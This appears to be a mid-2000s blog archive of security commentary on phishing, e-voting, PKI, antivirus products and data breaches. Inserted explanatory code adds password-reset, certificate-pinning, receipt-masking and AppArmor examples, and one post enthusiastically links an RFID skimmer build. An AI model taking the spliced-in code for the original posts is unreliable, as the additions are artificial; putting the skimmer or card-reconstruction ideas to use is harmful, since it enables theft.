Recently in Security Category

I noticed that one of the throw-away email addresses I registered years ago for Sony Style product registration and accessories is now receiving spam. Was Sony compromised or did they have an insider sell their addresses? Who knows... I know that I didn't give it out to anyone...

digg this!| | Comments (0) | TrackBacks (0)

This kind of thing was going on long before "phishing" was coined. It's the same thing in a different technology medium.

FOR IMMEDIATE RELEASE CONTACT: Scott Thomsen April 25, 2007 phone: 206/615-0978 pager: 206/386-4233

BILL COLLECTION SCAM TARGETS WEST SEATTLE
Customers Urged to Protect Credit Card Information from Con Artists

SEATTLE - Seattle City Light is urging its customers to be on guard against telephone con artists posing as utility bill collectors who appear to be targeting customers with Asian surnames in the West Seattle area.

In the past few days, several customers reported they received phone calls from people claiming to be City Light employees. One customer’s account was fraudulently tapped for more than $3,000.

In the scam, the callers claim there is a problem with payment of the customer's bill by check and demand credit card information to resolve the matter. This is similar to incidents reported to City Light in January and earlier this month.

Carol Dickinson, director of customer relations and account services, said City Light wants to help its customers protect themselves from such scams.

"We do not make outbound calls to customers asking for money to pay their bill or to ask for credit card payments or personal account information as part of our daily work," Dickinson said. "We respect customer privacy and take security of customer account and payment information seriously. We take many proactive steps to ensure that customer information is kept safe."

City Light sends at least two written warnings to customers who are about to have their power turned off, asking them to contact the utility directly to make a payment.

City Light also would like to remind customers:

  • Seattle City Light never asks customers over the telephone for credit card information to pay their bills.

  • Seattle City Light does not call customers on weekends.

  • Seattle City Light employees carry identification with the City Light logo and will always display it when asked.

All City Light customers are advised to take down the name and telephone number of anyone who calls and represents themselves as a City Light employee. Also, before customers provide any credit information, they should call City Light at 684-3000 to verify that the request is legitimate. If a customer believes he or she has been contacted by a con artist, they are urged to contact the Seattle Police Department at (206) 625-5011 to report the incident.


Boing Boing: Craigslist hoax ad leads to destroyed home

This happened in Washington. I couldn't believe it when I heard about it and now it's made it to Boing Boing. Scary.


The National Institute of Standards and Technology (NIST) recently published a paper condemning paperless electronic voting machines as insecurable.  I'll have to read the paper in-depth to see how they came to that strong of a conclusion, but I do know that there is no research showing that a purely electronic system can be completely trustworthy.

It's amazing how far this subject has come in just a few years, yet how far it still needs to go as evidenced by the irregularities in the recent 2006 midterm election.

Slashdot | NIST Condemns Paperless Electronic Voting

It's not really a typo but an intentionally left-out X separator for aesthetics on the sculpture that was intended to result in gibberish when decrypted that would clue in the decryptors to reinsert a separator and try again, except it ended up spelling something intelligible instead of garbage so they thought they had decrypted it properly!

A Break for Code Breakers on a C.I.A. Mystery - New York Times

For nearly 16 years, puzzle enthusiasts have labored to decipher an 865-character coded message stenciled into a sculpture on the grounds of the Central Intelligence Agency's headquarters in Langley, Va. This week, the sculptor gave them an unsettling but hopeful surprise: part of the message they thought they had deciphered years ago actually says something else.

A study from a year ago but just as valid today.  Actually, over the past year, IE got much worse.  There were many exploits and unpatched holes in the browser.

One of the best things you can do for your Windows security is to make sure you upgrade to IE 7.x, which has been redesigned to avoid many classes of attacks. It is being pushed out by Windows Update (or Microsoft Update). You can also switch to Firefox or Opera to get better security, but please don't use IE 6.x or older anymore!

Unfortunately, you have to be on Windows XP SP2 or higher to use IE 7.  So, it will force Windows 2000 users to upgrade to XP first.  That is probably also a good thing for security though.

Schneier on Security: Internet Explorer Sucks


Get this: the list of top terrorist targets from the Department of Homeland Security is seriously braindead. It includes 1,305 casinos, 234 restaurants, an ice cream parlor, a tackle shop, a flea market, and an Amish popcorn factory: 3,650 sites total. What's going on? Pork-barrel politics is what's going on. We're never going to get security right if we continue to make it a parody of itself.

The worst part is that DHS didn't even try to hide the pork-barreling by making the inclusions and omissions clear and blatant.  Oy.  I reluctantly file this in the security category...

The Seattle Times: Local News: Dept. of Homeland Lunacy

When it comes to homeland security, I give up.

I've tried to highlight the absurdity of trying to protect every cranny of our country from al-Qaida attack. I've critiqued everything from the waste of buying anti-terrorist locks for Sammamish City Hall to the illogic of not having security cameras outside our airport. And yes, I've resorted to that columnist stock-in-trade: mocking and satirizing.

But it turns out nothing I can make up is as ludicrous as what the Department of Homeland Security is actually doing.


Here's a description of how to open a common Master brand lock in about 10 minutes.  The design makes the 40^3 possible combinations collapse to 121.  It's a physical metaphor for bad cryptography and reliance on obscurity.

I happen to have a lock that I forgot the combo to that this will definitely come in handy for...if I can only find the lock...


This was the most troubling one:

Airport Security Oversights | The Onion - America's Finest News Source

Sept. 3, London to New York: A few Muslim people may have slipped through with their dignity



U.S. Cryptographers: 'FrpX-K5jE-Oc4n-e5Dn' | The Onion - America's Finest News Source

WASHINGTON, DC—In a carefully phrased, 128-bit encoded announcement that has challenged U.S. security agency procedures, top officials of the National Cryptography and Information Security Council warned that "FrpX-K5jE-Oc4n-e5Dn" if "Ha4d-87gH-uiH3-gB5r-g8Bh" late Monday.



This is an article from a year ago that showed how each vendor was able to respond to key virus outbreaks.  They also show the data from the previous year.

I personally recommend F-Secure's product. The base product gives you everything you need for anti-spyware and malware and is inexpensive. It is not a huge fat pig like some of the products out there (McAfee...). I've heard from others who enjoy Kaspersky as well, so either of those would be good choices, and they happen to both top this list.

I also personally got rid of McAfee products after a multitude of issues:

1. The product is seriously bloated, and the Security Center product seems geared more toward selling other McAfee products than toward providing normal users with value.
2. Many of the products in the suite are not well integrated.  They often had their own installers and were a real pain to uninstall.
3. Lots of errors resulting in having to reinstall the product (without there being an easy way to do so).
4. Their website security is horrendous. My wife forgot her password to their site so she used their "forgot my password" feature. Guess what? They emailed her, not a new random password, but her _actual password_. This from a security company! They either store passwords without encryption or store them with reversible encryption--both of which are seriously bad ideas and McAfee should know better.
5. Their suite product line is very expensive and the price seems to go up every year.  They have since reworked their product line and it seems to be better now.
6. I read the F-Secure blog and can tell those guys really get security.
7. McAfee was the company with the poor QA that removed critical Office files to "protect" you and also mislabeled a legitimate ISP software program.
8. McAfee products, like Symantec, have suffered from some local privilege escalation vulnerabilities or remote buffer overflows.  The cure is worse than the disease?
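Item 4 is worth spelling out in code, because the test is simple: if a site can mail you your current password, it is storing that password in a recoverable form. What follows is an added illustration (not McAfee's code and not from this post) of the storage and reset flow a site should use instead: only a salted PBKDF2 hash is ever kept, so the "forgot my password" feature has nothing to send but a random, single-use, short-lived token. UserStore and its methods are hypothetical names, and the "database" is an in-memory dict.

```python
"""Password storage and reset flow that can never mail back a real password.

Added illustration, not McAfee's code or anything from this post. Only a
salted, slow hash (PBKDF2 from the standard library) is stored, so a reset
has to mail a random, single-use, short-lived token instead of a password.
UserStore and its methods are hypothetical names; the database is a dict.
"""
import hashlib
import hmac
import os
import secrets
import time
from typing import List, Optional

PBKDF2_ITERATIONS = 200_000   # raise as hardware gets faster
TOKEN_TTL_SECONDS = 15 * 60   # reset links should die quickly
_DUMMY_SALT = b"\x00" * 16    # so unknown accounts take as long to check as wrong passwords


def _derive(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ITERATIONS)


class UserStore:
    def __init__(self) -> None:
        self._users = {}          # email -> {"salt": bytes, "hash": bytes}; no password field exists
        self._reset_tokens = {}   # sha256(token) -> (email, expiry time)

    def register(self, email: str, password: str) -> None:
        salt = os.urandom(16)
        self._users[email] = {"salt": salt, "hash": _derive(password, salt)}

    def stored_fields(self, email: str) -> List[str]:
        """What a database dump would contain for this account: a salt and a hash, nothing reversible."""
        return sorted(self._users.get(email, {}))

    def verify(self, email: str, password: str) -> bool:
        rec = self._users.get(email)
        if rec is None:
            _derive(password, _DUMMY_SALT)   # burn the same time as a real check
            return False
        return hmac.compare_digest(rec["hash"], _derive(password, rec["salt"]))

    def request_reset(self, email: str, now: Optional[float] = None) -> Optional[str]:
        """Returns the token to put in the e-mail (never a password), or None if the
        account does not exist. Only a hash of the token is stored, so a leaked
        database does not hand out live reset links."""
        if email not in self._users:
            return None
        token = secrets.token_urlsafe(32)
        expiry = (time.time() if now is None else now) + TOKEN_TTL_SECONDS
        self._reset_tokens[hashlib.sha256(token.encode()).digest()] = (email, expiry)
        return token

    def complete_reset(self, token: str, new_password: str, now: Optional[float] = None) -> bool:
        # pop() makes the token single-use whether or not the rest succeeds
        entry = self._reset_tokens.pop(hashlib.sha256(token.encode()).digest(), None)
        if entry is None:
            return False
        email, expiry = entry
        if (time.time() if now is None else now) > expiry:
            return False
        self.register(email, new_password)   # fresh salt, fresh hash
        return True
```

Call request_reset from the form handler and show the same "if that address is registered, mail is on its way" message whether it returned a token or None, so the reset form does not double as an account-enumeration oracle.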

Ranking Response Times for Anti-Virus Programs - Security Fix


I would add a 5th item:

5. Develop Reusable Security Architectures that cover common scenarios and include appropriate protection by design

Tools are sexy; secure design is hard. That's why you see so many tools and vendors hawking tools, but not nearly as much work on secure design. I hear from people all the time who talk about this tool or pen testing or scanning some server or how you need to hack your wireless network to be secure. That is a bunch of crap in general, because trying to audit your way to security is bottom-up, grass-roots, and can only get you so far. It's an early maturity model to be spending so much time and energy on audits and pen tests instead of security design reviews and developing security architectures. It's a lot easier and sexier to say you hacked a wireless network. We need to get to where it is just as cool to say you developed a wireless network security architecture such that you don't care who is connected to the wireless network, because your security is not so brittle as to lose sleep over it. Where are those reusable models made open source?

As for item #3, I don't think that I believe that there can be "quantitative" security risk management.  The biggest problem is that there is not enough good data to base future risk upon (try this:  how do you quantify risk of brand damage due to event X?). 

Item #4 is very important and speaks to ensuring security systems are usable.

CRA (Computing Research Association) Grand Research Challenges

Four Grand Challenges in Trustworthy Computing:

1. Eliminate epidemic-style attacks (viruses, worms, email spam) within 10 years;
2. Develop tools and principles that allow construction of large-scale systems for important societal applications -- such as medical records systems -- that are highly trustworthy despite being attractive targets;
3. Develop quantitative information-systems risk management to be at least as good as quantitative financial risk management within the next decade;
4. Give end-users security controls they can understand and privacy they can control for the dynamic, pervasive computing environments of the future.


It is hard to believe that such a blatant undervote error could be attributable solely to the DRE itself not properly recording them.  But user interface designs can certainly be abused maliciously, or likely unintentionally, to create these situations.  How ironic is it that the DREs that were touted to Help America Vote are actually helping them to undervote, due to poor design/implementation of the ballots?

Proper UI is just as important as sound underlying technology in ensuring proper understanding and usability of a system. Recall Why Can't Johnny Encrypt? A Usability Evaluation of PGP 5.0 and the more recent Why Johnny Still Can't Encrypt: Evaluating the Usability of Email Encryption Software for how even known secure software can result in insecure and unintended actions by the user. The infamous butterfly ballots were not DRE-based but certainly were flawed UI that caused voting errors in previous elections, so this is not a new issue to software or to voting by far.

This is a perfect example though of how using DREs to generate human-and-machine-readable receipts (voter verifiable) could allow voters to detect their undervotes before they drop them into the ballot box. There could even be very blatant warnings to the user on the receipt and on the screen that they didn't vote in X of the races to help prevent unintentional undervotes. Did these companies do any focus group testing of DREs?

FL-13: More Evidence of Ballot Design Issues - TalkLeft: The Politics Of Crime

...Bev Harris and the Jennings campaign want you to think otherwise. They want to point away from their mistakes. But the real problem was the design...


Aviv Raff On .NET - VML Exploit vs. AV/IPS/IDS signatures

Article showing how VirusTotal revealed how easy it can be to create "variants" that go undetected by most anti-virus products. The VirusTotal website could be a valuable resource.


Freakonomics Blog: An airplane announcement I’ve been waiting for

if I were a terrorist, don’t you think that I could figure out how to take the top off a bottle of contact lens solution and put my explosive liquids in there? It is totally pointless to enforce rules which impose costs on innocent people, but are easily circumvented by terrorists. Can anyone think this is accomplishing anything productive?

The BRAD BLOG : HACKED: VIRUS IMPLANTED, SPREAD ON DIEBOLD TOUCH-SCREEN VOTING MACHINE!

Researchers at Princeton, including Ed Felten, have been able to implant malicious code on Diebold touch screen voting machines that was demonstrated to be able to flip election results. They have a video of them doing this as well.

The company response is typically clueless (as is their security). I wonder if the nice Diebold ATMs in use at banks such as USBank are anywhere near as vulnerable?


The Open Voting Foundation

“This may be the worst security flaw we have seen in touch screen voting machines,” says Open Voting Foundation president, Alan Dechert. Upon examining the inner workings of one of the most popular paperless touch screen voting machines used in public elections in the United States, it has been determined that with the flip of a single switch inside, the machine can behave in a completely different manner compared to the tested and certified version.

Makes you wonder how secure those ATMs made by Diebold are (USBank uses them I know).


Schneier on Security: Hacked MySpace Server Infects a Million Computers with Malware

Malicious banner ad exploits unpatched IE hole (there are many and more all the time). You have switched to Firefox, Opera, Konqueror or anything other than IE, right?


SeaSec security forum

Just found out about an informal security group that meets in Seattle. I've often seen a need for interaction with security professionals between Agora and ISSA monthly meetings (and I'm on the ISSA Puget Sound board). Where organizations don't meet needs, they often spring up on their own. Once my dance lessons are over at Century Ballroom, I'll be able to attend these on Wednesdays.

Why? Agora and ISSA are too formal. This is just a chance to hang out with local security professionals and get to know each other.

SSL-authenticated login pages certainly don't _solve_ the phishing problem, since phishing is partly psychological/sociological and uses technology as a means of improving the odds of hacking the human psyche. So a purely technological fix is unlikely, prima facie, to address the root issues.

But, the SSL change can help in a couple of key ways:

  1. Rather than give customers zero tools to protect themselves, we can give them at least the best tool out there so far for authenticating our site, and therefore let them make an informed decision.
  2. Rather than continuing to train users to "trust page contents" (i.e. the lock image and our feeble assurances in the "Why this is secure" page), we can retrain them to use reliable measures that are not as subject to spoofing.

That is not to say that SSL does not have its problems:

  1. Who made the trust decision to put the 50-100 CA certs in the browser? Why should the user trust those introducers? How do we know that those issuers won't screw up (like Equifax/GeoTrust did recently by issuing a domain-verified cert automatically that was very similar to a real bank: http://jordy.gundy.org/?p=49)
  2. The UI is horrible for security. The lock is too small, it is too easy for the "simon says" problem to bite you since you don't notice when it isn't there. Some changes, such as changing the browser toolbar color based on the encryption will help, but Firefox and IE7 use different color schemes for the same semantics...
  3. There are usability issues with the UI. Everybody (even me) turns off the warning dialogs about submitting unencrypted form posts. That kind of annoy-user-into-submission security fails the psychological acceptability test and it doesn't work anyhow because you should generally protect the user where it counts, not warn and hope they do the right thing.
  4. The phishing problem is one of Identity Continuity. It's not important that an SSL certificate matches the domain, since that does not help during the initial introduction to a site. What you really should be protecting the users from is when a known relationship in the digital sense has a discontinuity. That signals a phishing attack. The analogy is SSH known_hosts. On the initial introduction, you choose to trust the server since the likelihood that you are being MITM attacked is infinitesimal. But, if you are MITM attacked, SSH will scream loudly and not let you connect. That is what the browsers should do, although clean up the UI a bit for the unwashed masses. The MITM issue is one of a discontinuity. So, SSL in the current sense solves the wrong problem because the browsers have no means of managing site continuity information. They should. Some schemes, such as trustbar and petnames, allow friendly site logos or names to help users detect continuity problems, but their UIs are too easy to ignore if there is a problem. The user should actually be stopped from proceeding.

And so on. That's just off the top of my head.
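The known_hosts analogy in item 4 can be made concrete. What follows is an added sketch, not from this post and not how any browser of the time behaved: it records the SHA-256 fingerprint of the leaf certificate first seen for each host (trust on first use) and turns any later change into a hard stop rather than a warning. Certificates are taken as DER bytes; the sample "certificates" in the usage are constructed placeholder byte strings, since the logic only hashes them. SiteContinuity, Verdict and the file format are all hypothetical names.

```python
"""known_hosts-style continuity check for web sites.

Added example, not from this post or from any browser. SiteContinuity pins
the SHA-256 fingerprint of the leaf certificate first seen for each host
(trust on first use) and reports a later change as a discontinuity, the way
SSH does with ~/.ssh/known_hosts. Certificates are DER bytes; all names here
are hypothetical.
"""
import hashlib
from enum import Enum
from typing import Dict, Optional


class Verdict(Enum):
    FIRST_CONTACT = "first contact: fingerprint recorded (trust on first use)"
    CONTINUOUS = "fingerprint matches earlier visits"
    DISCONTINUITY = "fingerprint CHANGED since last visit: do not proceed"


def fingerprint(cert_der: bytes) -> str:
    return hashlib.sha256(cert_der).hexdigest()


class SiteContinuity:
    def __init__(self, known: Optional[Dict[str, str]] = None) -> None:
        self.known: Dict[str, str] = dict(known or {})   # host -> fingerprint

    def check(self, host: str, cert_der: bytes) -> Verdict:
        fp = fingerprint(cert_der)
        seen = self.known.get(host)
        if seen is None:
            self.known[host] = fp             # SSH's "permanently added ... to the list of known hosts"
            return Verdict.FIRST_CONTACT
        if seen == fp:
            return Verdict.CONTINUOUS
        return Verdict.DISCONTINUITY          # the stored record is deliberately NOT updated here

    def accept_change(self, host: str, cert_der: bytes) -> None:
        """An explicit user decision, the equivalent of editing known_hosts by hand."""
        self.known[host] = fingerprint(cert_der)

    def dump(self) -> str:
        """Serialise in a known_hosts-like 'host sha256:<hex>' line format."""
        return "".join(f"{h} sha256:{fp}\n" for h, fp in sorted(self.known.items()))

    @classmethod
    def load(cls, text: str) -> "SiteContinuity":
        known: Dict[str, str] = {}
        for line in text.splitlines():
            line = line.strip()
            if not line or line.startswith("#"):
                continue
            host, _, fp = line.partition(" sha256:")
            if host and fp:
                known[host] = fp
        return cls(known)


if __name__ == "__main__":
    # constructed placeholder "certificates"; real code would hash the DER from the TLS handshake
    store = SiteContinuity()
    print(store.check("bank.example", b"constructed-cert:bank.example:2006").value)
    print(store.check("bank.example", b"constructed-cert:lookalike").value)
```

In a real client the DER would come from ssl.SSLSocket.getpeercert(binary_form=True) after the normal chain validation, and the verdict would have to block the page, not just decorate it. One caveat the post does not cover: pinning the leaf certificate means every legitimate renewal looks like a discontinuity, so a deployable scheme would pin the subject public key, which can survive renewal, or accept a successor certificate signed by the previous key.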

AJAX security is no different than normal web application security, except that it can add lots of complexity to a site and make black-box auditing much more difficult.

-----Original Message----- From: Andrew van der Stock [mailto:vanderaj@greebo.net] Sent: Tuesday, June 20, 2006 4:43 AM To: Webappsec (E-mail) Subject: Fwd: SF new article announcement: Ajax security basics

This was posted to SecurityFocus.com yesterday.

Their article is eerily similar to my Ajax presentation from February (particularly if you've seen me give the presentation), and even more similar to the draft Ajax chapter I wrote shortly after for the OWASP Guide (now posted to our Wiki - http://www.owasp.org/index.php/Ajax_and_Other_%22Rich%22_Interface_Technologies). Hmmmm. As the saying goes, this is the best form of flattery. I suppose.

If you haven't had a chance to read up on Ajax security, their article is a start... as is my presentation (http://www.greebo.net/?page_id=329) and the draft chapter in the OWASP Guide 3.0 current.

thanks,
Andrew

Begin forwarded message:

> > Ajax security basics
> > By Jaswinder S. Hayre, and Jayasankar Kelath
> > 2006-06-19
> >
> > The purpose of this article is to introduce some of the security
> > implications with modern Ajax web technologies. Though Ajax
> > applications can be more difficult to test, security professionals
> > already have most of relevant approaches and tools needed.
> >
> > http://www.securityfocus.com/infocus/1868

OWASP is pleased to announce the immediate availability of the OWASP PHP Top 5. The OWASP Top 5 is an education piece which provides up to date advice to PHP developers, hosters, and other PHP users. The PHP Top 5 is produced by the OWASP PHP Project.

The PHP Top 5 is based upon attack frequency in 2005 as reported to
Bugtraq. This information is a valuable insight into the most
devastating attacks against the world's most popular web application
framework.

In 2005, OWASP collaborated with SANS to research and write a completely
new PHP section for their successful SANS Top 20 2005. The OWASP PHP Top
5 is the full unabridged text, updated to reflect recent XSS attacks and
SQL injection vectors.

OWASP PHP Top 5

http://www.owasp.org/index.php/PHP_Top_5

OWASP PHP Project

http://www.owasp.org/index.php/Category:OWASP_PHP_Project


A Dangerous Loophole in Airport Security - If Slate could discover it, the terrorists will too. By Andy Bowers

More security window-dressing... More reason that ID checks and the watch list are BS security.


[IP] Govt Comp.News - Assessing "cyberterror" - couldn't find any!

> I've been working on the issue of how to build secure public networks for about 7 years. I started out as a military analyst and I wanted to put the cyber terror/cyber war issue in a larger strategic context. About a year ago, I started looking for examples of cyber-terrorism, where hackers had shut down critical infrastructures. I was surprised to discover that I couldn't find any, so I began to look more closely at the hypothetical scenarios involving cyber war. Most of them turned out to be implausible from a military or national security perspective. Hence the report.
[infowarrior] - Microsoft sponsors security career guide Richard Forno Fri, 08 Jul 2005 22:39:04 -0700

Microsoft sponsors security career guide
http://news.com.com/2060-10789_3-0.html?tag=nefd.bl

A nonprofit organization with help from Microsoft has created a "career
guide" to spark interest for the information security profession among high
school and college students.

The guide was distributed last month to more than 3,500 school counselors,
administrators and educators at education conferences and has been made
available online, the International Information Systems Security
Certification Consortium, or (ISC)2, said this week.

Microsoft sponsored the 35-page guide, which is titled "Decoding the
Information Security Profession." The booklet offers a description of
information security, typical jobs, titles, industries and organizations,
professional requirements, certification options, typical salaries, career
outlook, and a listing of schools, education facilities, certification
companies and other resources and associations.

The guide can be found at:
https://www.isc2.org/careerguide/


PKI considered harmful

Next time someone at your company says "we can't do encryption until we get a PKI", refer to this essay and collection of references.

I'll need to put together a related one to address the "we can't do encryption until we get a 'key management' solution" argument.


SSH Filesystem

This is a filesystem client based on the SSH File Transfer Protocol. Since most SSH servers already support this protocol it is very easy to set up: i.e. on the server side there's nothing to do. On the client side mounting the filesystem is as easy as logging into the server with ssh.

Something to investigate...


Western Union blocks Arab cash deliveries - Yahoo! News

DUBAI, United Arab Emirates - Money transfer agencies have delayed or blocked thousands of cash deliveries on suspicion of terrorist connections simply because senders or recipients have names like Mohammed or Ahmed, company officials said.

In one example, an Indian driver here said Western Union prevented him from sending $120 to a friend at home last month because the recipient's name was Mohammed.

Hard to believe it could be possible, but this is more stupid than the TSA's Secure Flight program (also a miserable failure).


cryocone: Identity leak with Sprint wireless

Someone in their infinite wisdom at Sprint set up an IVR that you can call (intended for internal care reps for identity verification) and get anyone's CPNI/PII by simply keying in their Sprint wireless phone number.

Really convenient for Sprint employees and the public -- and really stupid on all counts.


Time to switch your phone company. AT&T rewrote its privacy policy to basically say that your data is theirs and they will do what they please. Some legal maneuvering to allow them to continue to sell those records to the NSA to spy on you. All Cingular customers should now be wary since AT&T will own them once the acquisition is complete.

But I guess, what do you expect when we live in a country that doesn't explicitly grant privacy protections like the EU and where privacy is routinely tromped on by companies and the government for their own ends? And when the US public has been trained that this is okay?

http://www.networkingpipeline.com/showArticle.jhtml?articleID=189600470

The most disturbing revelation was one on June 30, 2006, when it was revealed that the NSA allegedly "Sought U.S. Call Records 7 Months Before 9/11". This is a perfect example of the danger of unchecked governmental power and unrestrained trust in government not to abuse power given to them or taken (as in the Bush Administration).


NPR 12-5-2002, All things considered 4pm.

"Businesses are so interested in extending credit..." that they just write off the losses. ID theft has not hit businesses economically yet, since that cost is borne by the victims, so they have no incentive to do anything to fix these problems. The disclosure laws have started to create that incentive, but instead companies seem to be lobbying to water down the proposed federal legislation and neuter the market incentive to fix the problems that the disclosure laws are creating (though, given the myriad reports still coming out every week about more data lost, you wonder what the heck some CISOs are doing).

Also, this story discusses a report that most ID theft is done by insiders. You do include insider attacks in your threat models, don't you? Kill the fortress mentality!


SecurityFocus HOME Columnists: Iraqi Cyberwar: an Ageless Joke

This is an OLD story so I hope that it is dead by now. But perfect example of the lack of fact-checking that goes on so much in the media.


Passionate condemnation of the music industry:

[IP] MUST READ Courtney Love does the math The controversial singertak

[IP] last on this topic -- Does File Trading Fund Terrorism? Successful artists not seeing any profit.

http://www.marketplace.org/play/audio.php?media=/2003/03/12_mpp&start=00:00:20:00.0&end=00:00:27:30.0

[IP] 2 more on Does File Trading Fund Terrorism?

And to round this out, a great interview with John Perry Barlow on the evils of Digital Restriction Management Wrapped up in Crypto Bottles

And to draw in a security angle to all of this:

Security Blog

Sony rootkit debacle highlights the failure of the security technology industry: The real story, as Bruce Schneier points out - why the hell didn't any Antivirus software (or IDS for that matter), detect this software sooner? Is corporate malware going to continue to be default allow by these products? We are collectively paying these companies billions of dollars for what?


[IP] I will start using my Visa card more

Wow this blog entry is old. But remember when every receipt had the full card number on it? And remember when Starbucks would mask out everything _except_ the last four digits so that you could get the full card number with just two receipts?

I still find that the business' copy of the receipts often has the full card number on it, with only my copy being masked out. But, I don't much care, except when it comes to my Debit card receipts since the US laws do not cover Debit cards as fully as credit cards.
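The two-receipts trick above is a general lesson about partial redaction: masks that hide different positions on different copies of the same document compose into no mask at all. The following is an added example (not the post's own code) that merges masked receipts position by position and, as the fix, shows that copies masked the same way reveal nothing extra no matter how many are combined. The card number is the constructed test PAN 4111111111111111 (Luhn-valid, not a real account), and all function names are hypothetical.

```python
"""Two inconsistently masked receipts reconstruct a full card number.

Added example, not from the post. A masked receipt is a string of digits and
'X'. merge() fills each position from whichever receipt reveals it, so
complementary masks leak the whole PAN; copies that all keep only the last
four digits leak nothing extra however many are merged. The PAN below is the
constructed Luhn-valid test number 4111111111111111.
"""
from typing import Iterable, List

PAN = "4111111111111111"   # constructed test number, not a real account


def mask_keep_last4(pan: str) -> str:
    """The customer copy the post describes: only the last four digits visible."""
    return "X" * (len(pan) - 4) + pan[-4:]


def mask_hide_last4(pan: str) -> str:
    """The complementary (bad) mask: everything visible except the last four."""
    return pan[:-4] + "XXXX"


def merge(receipts: Iterable[str]) -> str:
    """Combine masked receipts, keeping any digit that any receipt reveals."""
    rs: List[str] = list(receipts)
    width = len(rs[0])
    out = []
    for i in range(width):
        digits = {r[i] for r in rs if r[i] != "X"}
        if len(digits) > 1:
            raise ValueError(f"receipts disagree at position {i}; not the same card")
        out.append(digits.pop() if digits else "X")
    return "".join(out)


def revealed(masked: str) -> int:
    """How many digits a (merged) receipt exposes."""
    return sum(c != "X" for c in masked)


def luhn_valid(pan: str) -> bool:
    """The checksum every card number must pass; a merged PAN that passes is a usable leak."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


if __name__ == "__main__":
    leaked = merge([mask_keep_last4(PAN), mask_hide_last4(PAN)])
    print("complementary masks merged:", leaked, "luhn ok:", luhn_valid(leaked))
    safe = merge([mask_keep_last4(PAN)] * 3)
    print("three consistently masked copies merged:", safe, "digits exposed:", revealed(safe))
```

The defensive rule this encodes is the one the card brands later standardised on: every copy of every receipt, merchant's included, shows the same positions (at most the last four), so the mask is idempotent under merging.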


The other day, I made what I think is a very apt analogy comparing the security product industry to the diet and herbal supplement industry.

  • Both operate with little to no oversight or regulation (though security at least has bloggers and scientists willing to call out some of the more egregious offenders)
  • Products often have little to no academic, scientific or factual basis for their designs or claims
  • Products tend toward the panacea/"silver bullet" realm and claim to solve all your ills

I'm sure that I am missing some more...


Cracking Java byte-code encryption

Why Java obfuscation schemes based on byte-code encryption won't work.


A gaggle of links about the illegal NSA domestic spying program. More apropos in light of even more spying by the Bush Administration -- this time on international wire transfers

Think Progress: NSA Whistleblower To Expose More Unlawful Activity: ‘People…Are Going To Be Shocked’

Media Matters - Myths and falsehoods on the NSA domestic call-tracking program

Illegal NSA Data Mining Highlights Need for Congressional Oversight CDT legal analysis (Center for Democracy and Technology) of the NSA spying program

And some analysis of how this kind of program is ineffective (My favorite description is that finding a needle in a haystack is not made easier by increasing the size of the haystack)

Daily Kos: The NSA, the Database and YOU

Daily Kos: An Illusion of Privacy and Security


PayPal - Identity Protection Resources

It was a very good touch that PayPal even uses HTTPS (SSL) for their pages providing this security information so that end users can authenticate the pages originate from PayPal and get used to ensuring that their interactions with PayPal are SSL-secured.

Plugging my own product, but what the hell, it is open source :)

AppArmor http://opensuse.org/Apparmor is an application security container technology for Linux. It lets you create application profiles (policies) that define the files that the application can read, write, and execute. It lets you do this per-application, so you actually could allow users to upload arbitrary C/binary programs and expect them to behave as you specified. It provides an inheritance model so that you can't escape from this jail by exec'ing something fun: the child is controlled by policy too.

And for confining PHP (and PERL code run by mod_perl, and any other language interpreted in-place by Apache) AppArmor provides a change_hat API call and a mod_apparmor module for Apache, so that you can have AppArmor-style profiles wrapped around individual PHP pages and mod_perl scripts, even though they never appear in the process table.

If you find yourself between the rock of having to run some PHP or PERL code and a hard place of not trusting that code, try confining it with AppArmor, so that if/when the code screws up, it can only screw itself.

Crispin

--
Crispin Cowan, Ph.D. http://crispincowan.com/~crispin/
Director of Software Engineering, Novell http://novell.com
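What the change_hat mechanism described above looks like in a profile, as an added example (not from the post or the AppArmor project): an Apache profile with one hat for a single PHP page, so that page can only touch what its hat lists. Assumptions: Apache prefork at /usr/sbin/httpd2-prefork with mod_apparmor loaded, the application under /srv/www/htdocs/app, uploads under /srv/www/uploads.

```apparmor
# Added example profile; paths and the hat name are assumptions for the example.
#include <tunables/global>

/usr/sbin/httpd2-prefork {
  #include <abstractions/base>
  #include <abstractions/nameservice>

  # Bind port 80 as root, then drop to the web server user.
  capability net_bind_service,
  capability setuid,
  capability setgid,

  /usr/sbin/httpd2-prefork mr,
  /usr/lib/apache2-prefork/*.so mr,
  /etc/apache2/** r,
  /var/log/apache2/* w,
  /srv/www/htdocs/** r,

  # Hat for one PHP page. mod_apparmor calls change_hat() into the hat named by
  # the AAHatName directive before the request reaches PHP and changes back
  # afterwards. A hat does not inherit the rules above: while the page runs, the
  # process has exactly the permissions listed in this block and nothing else.
  ^app-upload {
    #include <abstractions/base>
    /srv/www/htdocs/app/upload.php r,
    /srv/www/htdocs/app/lib/*.php r,
    /srv/www/uploads/** rw,
    /tmp/php* rw,            # PHP's temporary files for uploaded content
  }

  # Matching Apache configuration (goes in the vhost, not in this profile):
  #   <Location /app/upload.php>
  #     AAHatName app-upload
  #   </Location>
}
```

If the page is compromised, a write to anything outside /srv/www/uploads (or an attempt to exec a shell) is denied and logged, which is the "it can only screw itself" property the post describes.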


How to Build a Low-Cost, Extended-Range RFID Skimmer

Oh, I'm definitely going to have to build one of these!!


(19 June 2006)
Letters are being sent to 13,000 individuals whose personal data are held in a laptop computer stolen from the home of an ING US Financial Services agent. ING is instating a new security policy for laptop computers that includes encryption and password protection; the stolen computer had neither. The people affected by the data security breach are all District workers and retirees.
(please note: this site requires free registration) http://www.washingtonpost.com/wp-dyn/content/article/2006/06/18/AR2006061800716_pf.html
[Editor's Note (Northcutt): ING's slogan is Your Future. Made Easier. Try telling that to the 13,000 impacted individuals. This wave of data losses is starting to remind me of counties that don't put traffic lights up until there is a motorist fatality.
(Grefer): Invest around 30-40 dollars into a cable lock for your laptop computers and spare yourselves this embarrassment as well as lots of headaches for your customers. Further, even if you don't want to spend the money for encryption software, at least use the EFS (Encrypted File System) functionality provided within Windows XP Professional to add a bit more security to the mix.]


27B Stroke 6

